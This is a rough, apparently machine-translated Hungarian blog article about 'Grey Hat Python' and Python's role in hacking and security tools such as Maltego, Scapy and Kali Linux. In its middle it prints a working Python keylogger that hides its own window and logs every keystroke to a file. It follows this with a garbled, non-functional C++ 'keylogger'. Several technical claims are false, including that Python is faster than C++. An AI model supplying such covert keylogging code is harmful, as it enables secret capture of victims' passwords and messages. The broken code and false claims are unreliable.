Grey Hat Python - Tehát két évvel ezelőtt a programozási nyelvekkel foglalkoztam, elkezdtem olvasni a C, C ++, Assembly, Python és Ruby témákról. Kiberbiztonsági szakértővé akartam válni. Szóval, amennyire csak tudtam, elkezdtem tanulni. A C, C ++ és C # alapokkal kezdve, és sok program és vírus megtanulása és összeállítása után végül elkezdtem tanulni a Kali Linuxot. Azok számára, akik nem tudják, mi a Kali Linux, ez egy operációs rendszer a penetráció teszteléséhez. Tehát folytattam a tanulmányaimat, és amit láttam, az volt, hogy a legtöbb programot, a vírusokat és a trójait Python-ban állították össze, és alapjaik Ruby.

Tehát abbahagytam a tanulmányaimat, és elkezdtem tanulni a Python-ot, vagy pontosabban a Grey Hat Python-ot és a tadaa-t. Rendkívül egyszerű volt, összehasonlítva a C, C # vagy bármilyen más nyelvvel, amelyet megtanultam. Végül megtudtam, miért volt a Python a leggyakrabban használt nyelv, és hogyan vált híressé.
Tehát ma azt vitatkoznám, hogyan alakult át a Python a Grey Hat Python-ról, és miért használják azt olyan széles körben, hogy még a Google és a YouTube is használja az adatbázisában, hogy a lehető legpontosabb keresési eredményeket adjanak.

Kezdve a Python egy magas szintű programozási nyelv, ami azt jelenti, hogy szintaxisa rendkívül könnyen olvasható, még kezdők számára is. Ha még nem ismeri a programozást, akkor erre a nyelvre javaslom, hogy kezdje. Hadd mutasson egy példát:

Így néz ki C-ben: -

#include

int main()
(
printf("Hello world\n");
return 0;
)

Így néz ki a Java: -

class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)

És így néz ki a Python (v2.7)

print "Hello World"

Egyszerű? Igen, ez az. Tehát a Python nem csak könnyű volt írni és megérteni, hanem nagyon kompakt is. Tehát, kíváncsi lehet, hogy ez hogyan vezetett a Grey Hat Pythonhoz?

Ajánlott tanfolyamok

  • IP útválasztási tréning
  • Hackelés tanfolyam
  • Teljes RMAN oktatás
  • Python programozási tréning

Python vs Grey Hat Python

Szóval, mi is a Grey Hat Python? Miért különbözik annyira a normál Python-tól? A szürke kalap A Python nem más, mint a Hackerek, a Network-Stressz tesztelők és a Fordított mérnökök által Pythonban írt programok, amelyek a program létrehozására vagy feltörésére szolgálnak. A Grey Hat kifejezést azonban azért használják, mert nem pontosan hasznos vagy felhasználói szoftver. Általában biztonságot nyújt, vagy biztonságot megsértő szoftvert hoz létre.

Könnyen felhasználható a biztonságos környezet korlátozásainak tesztelésére vagy a biztonságos környezetbe való áttöréshez. Ezt jelenti a Szürke Kalap. Sokkal könnyebb ezt Pythonban megtenni, ahelyett, hogy C, C ++ vagy java formában tennék. Így a Grey Hat Python név. Néhány példa, amire gondolok:

• Kulcsnaplók írása (Hackerek és Pénztárosok számára)
• Biztonsági héj parancsfájlok írása (hálózati rendszergazdák számára)
• Automatizált IDS (behatolás-érzékelő rendszer biztonsági mérnököknek) írása

Tehát, most már tudja, hogy miért és miért hasznos a Grey Hat Python. Ennek kidolgozására hadd adjak néhány részletes példát.
Lehet, hogy hallottál a Google App Engine-ről. A Google App Engine eredetileg Pythonban lett kifejlesztve, mielőtt beillesztették volna. A Google App megfelelő példája a Python-ban írt programnak, mivel lehetővé teszi webes alkalmazások készítését a csúcskategóriás könyvtárak, eszközök és keretek gyűjteményének felhasználásával.

Gondolkozott már azon azon azon, hogy miért olyan könnyű keresni valamit a Google-on? Leggyakrabban olyan keresési eredményeket kap, amelyek 80% -kal pontosak. Ennek oka az, hogy a Python rendkívül rugalmas, nagy sebességgel működik, és az adatbázisok sokkal kompaktabbak, bár „n” információt tárolnak. A Python annyira kibővíthető, hogy még a YouTube olyan célokra használja, mint a videó megtekintése, a sablonok ellenőrzése, a videó adminisztrálása, a kanonikus adatokhoz való hozzáférés és még sok más.

A Google robotjainak bejárói és pókjai összegyűjtik az adatokat, mihelyt feltöltik őket az interneten, függetlenül attól, hogy hol vagy mennyire biztonságos. Ehhez csak megfelelő inspirációra, időre és ismeretekre van szükség ezen információk összegyűjtéséhez.

A Google keresései korábban a Pythonon alapultak, amelyet később C ++-ra változtattak a sebesség optimalizálása érdekében, mivel a Google robotok másodpercenként több oldalt másznak be, és mindegyiknek néhány percbe telik a feltérképezés. A Python jelenleg sokkal gyorsabb, mint a C ++, de ez nem volt ugyanaz az eset néhány évtizeddel ezelőtt.

Volt egy híres idézet, amelyet a Google idézett: -
"Python, ahol tudunk, C ++, ahol kell."

Tehát kíváncsi lehet, hogyan lehet ezt felhasználni a hackelésre, a pentesztelésre és a hálózati biztonságra. Ellent kell mondanom. Ha elkészíthet egy 70–80% -os pontosságú programot a hatékony keresési eredmények megadásakor, akkor valószínűleg létrehoz egy alkalmazást, amely összekapcsolhatja a weboldalakat, okosan kereshet, és felépíthet egy olyan személy profilját, amelyet inkább az Egyéni Fekete Kalap használhat. rosszindulatú célokra. Hagyja félre az egyéneket, ha elég okos, akkor könnyen elkészíthet egy alkalmazást egy cég profiljának felépítéséhez, az egész fa a gyökerétől kezdve bármire gondol, amire gondol.

Információgyűjtés Maltego-n keresztül

Lehet, hogy arra gondolsz, hogy kissé eltúlzom. Nem, nem vagyok!

Gondolj olyan példákra, mint Maltego. A Maltego egy szoftver, vagy jobban tudom újranevezni azt nyílt forrású kriminalisztikai alkalmazásként, amely információgyűjtés és emberek, vállalatok és más vállalati ügynökségek profiljának felépítése céljából készült.

Csak be kell írnia a megfelelő adatokat az alkalmazásba, és más dolgok, például e-mailek, emberek, embercsoportok összekapcsolása, akár az olyan internetes infrastruktúra meghatározása, mint például a domainek, a DNS-nevek, a Netblokkok és az IP-címek összekapcsolhatók és összekapcsolhatók ezen nyílt forráskódú intelligencia segítségével .

További információért látogasson el ide: Mi a Maltego?

Tehát, ha a „Titkos információk” elérése határozza meg a sikerét, akkor a Maltego segíthet Önnek felfedezésében. A Maltego részben Python-ban van írva, és a Java-t is használja, amely szintén nagyszerű nyelv.

Annyira, hogy idéznünk kell a Google biztonságát. Pontosabban fogalmazva: a Google a legkevesebb módja annak, hogy névtelennek tarthassa magát az interneten, nem számít, ha inkognitót vagy a www.duckduckgo.com webhelyet használja-e a chrome-tól. Mert végül minden frissül az interneten. A lényeg, hogy itt van, nem a sérthetetlenségről szól, hanem arról, hogy abszolút sebezhetővé válunk. Nem lehet teljesen megtisztítani magát az internetről. De biztosan meg lehet próbálni a lehető legkevesebb információ tárolását az interneten.

A Python nem csak egy nyelv, hanem egy szkriptnyelv is. A szkriptnyelvek lehetővé teszik, hogy saját eszközöket írjon, módosítsa, ha valami még inkább személyre van szüksége. Ezek a hálózati biztonsági eszközök a bővíthetőség szempontjából nagyban függnek a szkriptnyelvtől. Például vegyük a Scapy-t.

A Scapy tisztán Python-ban van írva. Ez egy hatékony interaktív csomagkezelő eszköz. Saját magában generál hamis csomagokat, szkennelhet hálózatokat, és szippanthatja a csomagokat is a hálózaton.

Részletes információk a Mi az Scapy termékről?

Most ezek összetett programok, amelyeket fejlett programozók írtak. Lássuk, milyen egyszerű olyan programot írni Python-ban, amely könnyen érthető az emberek számára, akik jó programozási alapokkal rendelkeznek.

Ez egy keylogger, amelyet Python-ban írtak: -

#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)

proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input

Tehát ez sokkal több, mint egyszerű, ha kérdezel tőlem. Most egyszerűen hozzáadtam a pyhook, Pythoncom, Win32gui és Win32console modulokat, amelyeket könnyedén letölthet a Sourceforge webhelyről, és a hash-tag segítségével említettem a megjegyzéseket. De ha ugyanazt a programot kell írnom a C ++ programban, nézzük meg, milyen nehéz ez lehet.

Ez egy olyan program, amely C ++ nyelven íródott: -

 #include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )

Tehát ez elég nagy a Pythonhoz képest. És ha a hatékonyságról beszélünk, akkor a Python könnyen konvertálható egy futtatható fájlba erőfeszítés nélkül, a py2exe szoftver használatával. Míg ha C ++ -ról beszélek, akkor őszintén szólva ez a kód vicc. A megfelelő kulcsnaplózó megírásához egy DLL-t kell írni, amely végrehajtja a WH_KEYBOARD kampót. Ezenkívül ez a kód messze nem olyan egyszerű, hogy a kezdő számára könnyen érthető legyen.

Nyílt forrású hackelés

Most ez a Black Hat hackerekkel foglalkozik, pontosabban azok az emberek, akik megsemmisítik, manipulálják az adatokat saját szükségleteikre. A biztonsági aggodalmak szempontjából a Python hasznos a White Hat hackerek számára is, akik meg akarják menteni a társadalmat a rosszindulatú hackerek támadásaitól. Ha karriert szeretne létrehozni, vagy legalább meg szeretné tanulni a Python-ot biztonsági kutatás céljából, akkor biztosan elmélyülhet az OWASP, a BRO vagy a Quick NIX Secure Script segítségével.

Az OWASP egy nyílt webes alkalmazásbiztonsági projekt. Az OWASP célja a Python biztonságosabb verziójának létrehozása, amely megkönnyíti a biztonsági szakemberek és a fejlesztők számára, hogy a szoftverek kevésbé hajlamosak a hackerek támadására. Ez a Black-Box elemzéssel kapcsolatos, a biztonsággal kapcsolatos kérdések azonosításával és kezelésével kapcsolatos, amelyek befolyásolhatják a Python interaktív tolmácsát.

A BRO egy hálózati biztonsági és forgalomfigyelő program, míg a Quick NIX fájlok tulajdonjogának megszilárdításához és biztonságához gyors használatban van.

Mivel a biztonságról beszélünk, beszéljünk egy olyan operációs rendszerről, amely részben a Python alapú. A Python remekül működik a UNIX, LINUX és Debian rendszerekkel. Az egyik leghíresebb operációs rendszer a Backtrack 5 volt. Különböző verziók kerültek kiadásra. Kifejezetten a PenTestinghez készült. Később az Offensive Security munkatársai azt hitték, hogy a Backtracknek újraindulásra van szüksége, mert az eszközök többsége vagy nem működött megfelelően, vagy nem volt támogatva.

Később kiadták a Kali Linuxot, amely teljes mértékben Debian alapú volt. És a keret nagy része Ruby vagy Python formátumban van. A Ruby is fantasztikus szkriptnyelv. De én bármikor jobban szeretném a Python-ot, mint ezt, az oka annak, hogy a Pythonnak sokkal változatosabb közössége van a Linux-szal, közvetlen és könnyebben hibakereshető. Míg a Rubynak sok funkciója van, és gyorsan alkalmazkodik a környező környezethez, nehéz lehet hibakeresést végezni, nehezen olvasható és kifinomultabb, mint a Python.

A legjobb példa az Apple és a Linux összehasonlítása vagy az iPhone és az Android összehasonlítása. Az Apple gazdag forrásokban, rendkívül sima, és inkább elfogult a kezdők felé. Míg a Linux / Android felhasználóbarát, kissé késleltetett, és néha fejfájást okozhat, ha nem tudja, hogyan kell beállítani vagy karbantartani.

Van még egy könyv, amely Justin Seitz Python Grey Hat Hacking-jén alapul. Ez kifejezetten az unalmas fordított tervezéssel és a biztonsággal kapcsolatos feladatok automatizálásával foglalkozik, a saját hibakereső tervezésével, a könyvtár és a DLL injektálással, a biztonságos forgalom szinkronizálásával egy titkosított munkameneten keresztül, valamint az Immunity hibakereső, Sulley és még sok más használatával. Ez egy fantasztikus könyv, függetlenül attól, hogy kezdő vagy szakértő, minden alkalommal megtanul egy vagy több dolgot, amikor elolvassa.

Következtetés

Tehát, ha kezdő vagy, a Python lenne a megfelelő választás az első programozási biztonsági tesztelési nyelvként.

Ne felejtsen el egy dolgot a végén A Grey Hat Python nem csupán nyelv, hanem a módja annak, hogy a dolgokat megfelelő és gyors módon végezzék el.

Első képforrás: pixabay.com

Kapcsolódó cikkek:-

Íme néhány cikk, amely segít részletesebben megismerni a Grey Hat Python-ot, tehát csak keresse meg a linket.

  1. A kiberbiztonsági eszközök előnyei Önnek tisztában kell lennie
  2. Karrier Pythonban
  3. A 25 legnépszerűbb csodálatos Python interjú kérdése és válaszai
  4. Mik a Python használatának előnyei és korlátai?
  5. Python vs Node.js
  6. Útmutató a kiberbiztonsági interjúkérdésekhez
  7. Különböző típusú eszközök a biztonsági teszteléshez

Kategória:

Szoftverfejlesztés